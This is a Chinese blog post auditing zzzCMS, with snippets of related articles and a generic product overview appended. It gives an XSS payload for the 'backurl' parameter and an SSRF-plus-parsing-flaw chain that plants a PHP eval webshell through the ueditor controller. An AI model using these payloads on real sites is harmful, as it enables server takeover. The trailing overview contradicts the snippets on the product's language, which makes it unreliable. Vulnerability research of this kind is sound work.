zzzCMS小计

最新推荐文章于 2022-03-03 20:15:31 发布
原创 最新推荐文章于 2022-03-03 20:15:31 发布 · 676 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了XSS跨站脚本攻击与SSRF服务器侧请求伪造两种网络安全漏洞,详细分析了其在实际应用中的表现形式及利用方式。通过具体案例,展示了如何通过构造恶意脚本和利用中间件解析漏洞,实现对目标系统的攻击。

XSS

路径:/plugins/template/login.php
在这里插入图片描述
url的值:

$url =conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=' ;

这里的$backurl 是我们可控的:

$backurl=getform('backurl','get');

另外还要注意到,这里 href 没有用双引号包裹住$url,这就导致我们只要用空格就能分离属性,构造出我们想要的属性,可以 F12 看一下源码:
在这里插入图片描述
我们要达到的目的:

<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>

$backurl=test onmouseover=javascript:alert(1111) test=

弹框成功:
在这里插入图片描述

ssrf+中间件解析

漏洞文件:

/plugins/ueditor/php/controller.php

漏洞代码:
在这里插入图片描述
可以看到这一段接收用户输入的 url ,另外还有两个参数:
在这里插入图片描述
用户输入 upfolder 参数,为上传文件的路径,另外还有 action 要为 catchimage

我们可控的两个参数就是 actionupfolder,看一下对这两个参数有什么具体的过滤措施:

  • safeword(): 在这里插入图片描述
    函数过滤了其他符号,仅保留字母和数字

  • safe_url()
    在这里插入图片描述
    这里对 url ,保留输入的url中的 a-zA-Z0-9,.:=@?_\/\s]

然后再看看传输文件的函数 down_url()
在这里插入图片描述
在这里插入图片描述
重点看对 url 的过滤,函数没有对 ip和域名进行过滤,另外文件名和文件后缀来自于我们输入的 url ,保存的文件没有进行重命名,只是要求文件后缀不能为空,还有文件后缀必须在白名单内,看一下 conf()
在这里插入图片描述
可以看到我们不能看到合法的文件后缀,但是,可以看到与 controller.php 同目录下有个 config.json 文件,里面有一项:

"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],

简单地看了一下,一些危险文件后缀都被过滤掉了,于是直接制作图片木马(虽然手段很老了),文件内容:<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>,木马制作好放到自己的服务器上,然后在访问 contorller.php 发送请求,
在这里插入图片描述
这时候再访问:http://www.gohosts.com/upload/file/2.jpg/.php

然后就可以在/upload/file 路径下看到生成了一个 shell.php
在这里插入图片描述
查看 shell.php
在这里插入图片描述
可以看到写入 shell 成功。这里利用到了 nginx <8.03 和 IIS 7.0/7.5 中间件的解析漏洞。

zzcms接口index.php id参数存在SQL注入漏洞
shelter1234567的博客
02-08 729
zzcms接口index.php id参数存在SQL注入漏洞。ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。攻击者可通过sql盲注等手段,获取数据库信息。
zzcms2019存储型xss漏洞审(超详细)
Cvjark的博客
03-27 1313
存储型xss漏洞复现 function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) { $string=stripslashes($string); if ($htmlspecialchars_decode==true){ $string=htmlspecialchars_decode($string);//转html实体符号 } if ($nl2br==true){ $string=nl2br($
zzzcms互联网商务建站系统 免费建站系统源码 asp建站系统源码 asp企业网站源码
07-19
zzzcms采用asp+access Utf-8进行开发,软件绿色且可直接使用,直接上传到空间内即可使用。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,降低确认,返回,知道了等按钮的出现,并支持按键exc,ctrl+enter返回和提交功能。 集成好了自动关键词,自动描述,自动拼音,留言模块,会员模块,产品相册模块,百度地图模块,qq客服模块,自动静态,翻页样式,批量传图,批量加栏目等等,后续还会增加更多方便、实用的模块。 功能模块: 1.支持电脑端+手机端,支持无缝切换。 2.支持站内模糊搜索。 3.支持会员系统,找回密码,会员头像等。 4.支持内容会员权限功能。 5.集成两套qq客服,支持多个qq,多个电话,多个联系人。 6.支持全站自动静态,支持伪静态+静态缓存。 7.支持数据库备份、恢复功能。 8.支持session、cookie模式切换,香港空间不怕狂掉线了。 9.支持批量上传图片,自定义参数,自动关键词,描述,tag标签等。 10.支持上传文件管理,支持冗余检测。 11.支持模板切换、管理,在线模板。 12.支持插件热插拔,在线插件。 13.支持留言、管理员回复。 14.支持aspjpeg水印,支持png透明水印。 15.支持jmail邮件提醒,支持配置设定。 16.支持验证码开关。 17.支持批量添加栏目,支持无线级栏目。 18.支持栏目模型管理。 19.支持栏目模型自定义参数管理。 20.支持幻灯管理,幻灯数量和分组不限。 21.支持友情链接管理。 22.支持广告管理。 23.支持Tag标签。 24.支持自定义内容。 25.支持首页翻页。 26.支持百度地图标注,自动生成。 27.支持网站logo,手机logo,微信图片的上传。 插件功能: 1.会员投稿功能插件。 2.内链关键词功能插件。 3.筛选功能插件。 4.顶踩、赞一个、推荐功能插件。 5.全功能自定义表单插件。 6.评论插件
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428.zip
04-05
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428.zip
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428
10-16
zzzcms采用ASP+ACCESS/MSSQL免费建站整站系统,所有源码开源完整,支持直接使用。zzzcms要打造一款最简单、最安全、最舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,优化流程,并支持按键exc,ctrl+enter返回和提交功能,zzzcms功能和标签极其简单,方便记忆和编写。从1.4.0以后开始支持MSSQL数据库,从1.4.1开始支持短链接,从1.4.2开始支持伪静态。从1.5.0全新的开始,全新的体验zzzcms功能模块:1.支持电脑端+手机端,支持无缝切换,支持手机自动识别。2.支持站内模糊搜索,支持自定义搜索参数,支持搜索模型。3.支持会员注册、登陆、找回密码、点对点发短信,修改会员头像等。4.支持内容会员权限功能。5.内置三套qq客服,支持多个qq,多个电话,多个联系人。6.支持支持伪静态,静态,缓存,静态功能采用全自动模式。7.支持数据库备份、恢复功能,支持mssql备份还原。8.支持session、cookie模式切换,香港空间不怕狂掉线了。9.支持批量上传图片,自定义参数,自动关键词,
手机建站系统php,zzzcms免费开源建站系统含手机
weixin_42584507的博客
03-27 1098
zzzcms采用ASP+ACCESS/MSSQL免费建站整站系统,所有源码开源完整,支持直接使用。zzzcms要打造一款最简单、最安全、最舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,优化流程,并支持按键exc,ctrl+enter返回和提交功能,zzzcms功能和标签极其简单,方便记忆和编写。从1.4.0以后开始支持MSSQL数据...
(环境搭建+复现)zzzcmsV1.7.5前台RCE
daxi0ng的博客
02-02 4038
0x00 简介 zzzcms是一款PHP语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。 0x01 漏洞概述 ZZZCMS一处远程代码执行漏洞。由于某些函数存在过滤不严格,攻击者通过构造恶意请求,可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 ZZZCMS 1.7.5 0x03 环境搭建 1、下载ZZZCMS 1.7.5 链接:https://pan.baidu.com/s/1uJ81idkgE38317F5jaze
Zzzcms 1.75后台地址泄露
09-07
ZZZCMS parserSearch 远程命令执行漏洞和parserSearch 存在模板注入导致远程命令执行漏洞## **二、复现过程** 存在一个比较奇葩的文件直接将一些属于不可访问的zzz_config.php的内容直接给回显了,该信息泄露文件...
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428-ASP源码.zip
01-26
zzzcms是一款基于ASP语言开发的免费开源建站系统,专为中小企业和个人用户提供便捷、高效的网站搭建解决方案。该版本为v1.5.6 Build20190428,意味着它在2019年4月28日进行了最后一次重大更新,包含了在此日期前的...
zzzcms商务建站系统 v1.3.3 Build20170122
12-02
zzzcms采用asp+access进行开发的建站系统源码,软件绿色可直接使用,直接上传到空间内即可。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更节省时间,减少和管理员工作,在交互上...
zzzcms商务建站系统 v1.2.6
12-05
zzzcms采用asp+access Utf-8绿色直接使用版,直接上传到空间内直接使用。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更节省时间,减少和管理员工作,在交互上尽量减少操作步骤,...
zzzcms免费开源建站系统含手机 v1.3.9 Build20170701
11-30
zzzcms采用asp+access进行开发的建站系统源码,软件绿色可直接使用,直接上传到空间内即可。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更
ZZCMS漏洞复现和代码审
qq_48511129的博客
01-25 9164
ZZCMS漏洞复现和代码审
zzcms SP3 漏洞解析
m0_46684679的博客
12-15 3995
zzcms SP3 漏洞解析 cms来源: ZZCMS SP3 URL: www.zzcms.com 作者:壮壮 很老的cms版本,应该没人会用了吧,这里找找简单地漏洞 有使用seay扫描器扫描,但误报率高,只能简单的参考,实际还是得自己动手看代码(…) 1.xss储存型漏洞 范围:Book.php留言界面 测试后: 有轻微的参数过滤痕迹,但并不完全,还是能简单的在管理页面执行恶意xss代码 恶意代码js: <IMG SRC="javascript:alert(1);"
代码审轻松拿下CNVD证书
weixin_43460070的博客
04-21 2171
CSU小学弟终于在前些日子拿到了自己的第一个CNVD证书,写此文章留作纪念 一、版本及官网概述 ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/ 在admin目录下的tag.php出现了漏洞 二、漏洞发现过程分析 Tag.php 38-62行 67-77行 我们传入相应的参数直接进入showtag这个方法里面 接下来开始分析showtag()这
phpinfo函数无法执行_再谈 zzzcms 代码执行,你也能审出来的高危漏洞
weixin_39631350的博客
12-21 441
本文作者:sher10ckzzzcms 的后台模板处的命令执行可以说是这套 CMS 比较典型的漏洞了,很久之前自己跟踪过一遍漏洞代码,最近又拿起来玩了玩,发现自己也能够审到这个漏洞点,整个漏洞审的过程也很简单,没有啥骚操作。下面我就会按照审的思路,而并非漏洞分析的思路,给大家说说我是如何通过自己的努力审出这个命令执行漏洞的cms 下载地址:https://yunpan.360.c...
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 5040
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
zzcms8.2 用户修改密码漏洞
xdjxi的博客
03-03 4576
既然注册的地方存在逻辑漏洞,未对图形验证码做任何防护。那大胆猜测一下,找回密码处也存在漏洞 好的,抓包 这是找回密码的界面,很简单,就一个图形验证,但刚刚已经发现,注册的地方图形验证好像也没什么用,那估这里也一样。 继续下一步 发现需要验证码,但是邮箱地址是假的啊,上哪找去,emmm,在经过了一般思考后,我决定先把每一步用burp抓包看一下,然后发现它返回的包是这样的 这是一个JavaScript代码 题外话:刚刚检测用户是否存在也是这个提示,或许待会可以试试用户注册重置 先..
zzzcms
最新发布
05-26
### ZZZCMS概述 ZZZCMS 是一款基于 PHP 和 MySQL 的开源内容管理系统 (CMS),旨在帮助开发者快速构建网站并管理其内容[^1]。它提供了丰富的功能模块以及友好的用户界面,适合中小型企业的官方网站建设。 以下是关于 ZZZCMS 下载、安装配置及使用的详细介绍: --- ### ZZZCMS下载地址 官方通常会提供最新版本的下载链接。可以通过访问官网或者 GitHub 开源仓库获取最新的稳定版文件包[^2]。确保从可信渠道下载以防止恶意软件感染。 #### 示例代码:验证下载文件完整性 ```bash sha256sum zzzcms-latest.zip # 将输出的哈希值与官方发布的校验码对比确认无误后再解压使用。 ``` --- ### 安装指南 1. **环境需求** - Web服务器支持 Apache/Nginx/Tomcat 等常见服务端程序; - 数据库引擎需启用 MySQL 或 MariaDB 支持; - 后端脚本语言应为 PHP7.x 及以上版本[^3]。 2. **上传至服务器** 解压缩所获得的 ZIP 文件并将全部目录结构通过 FTP 工具传输到目标主机根路径下。 3. **数据库初始化** 创建一个新的空白数据库实例,并赋予相应权限给指定账户名用于后续连接操作。 4. **运行安装向导** 打开浏览器输入域名/IP 地址进入初始设置页面按照提示完成参数填写即可自动部署完毕[^4]。 --- ### 基础使用说明 - 登录后台管理面板可实现文章发布编辑删除等功能。 - 自定义模板样式满足个性化展示效果调整需求。 - 插件扩展机制允许第三方贡献更多实用特性集成进来提升整体体验度[^5]。 --- ### 配置优化建议 为了提高性能表现可以考虑以下几个方面: - 缓存策略设定减少重复查询消耗资源时间成本。 - 图片懒加载技术应用改善移动端浏览流畅感。 - SSL证书绑定保障数据传输过程中的安全性[^6]。 ```php // 示例PHP片段演示如何开启Gzip压缩加速网页加载速度 if (substr_count($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')) { ob_start("ob_gzhandler"); } else { ob_start(); } ``` ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值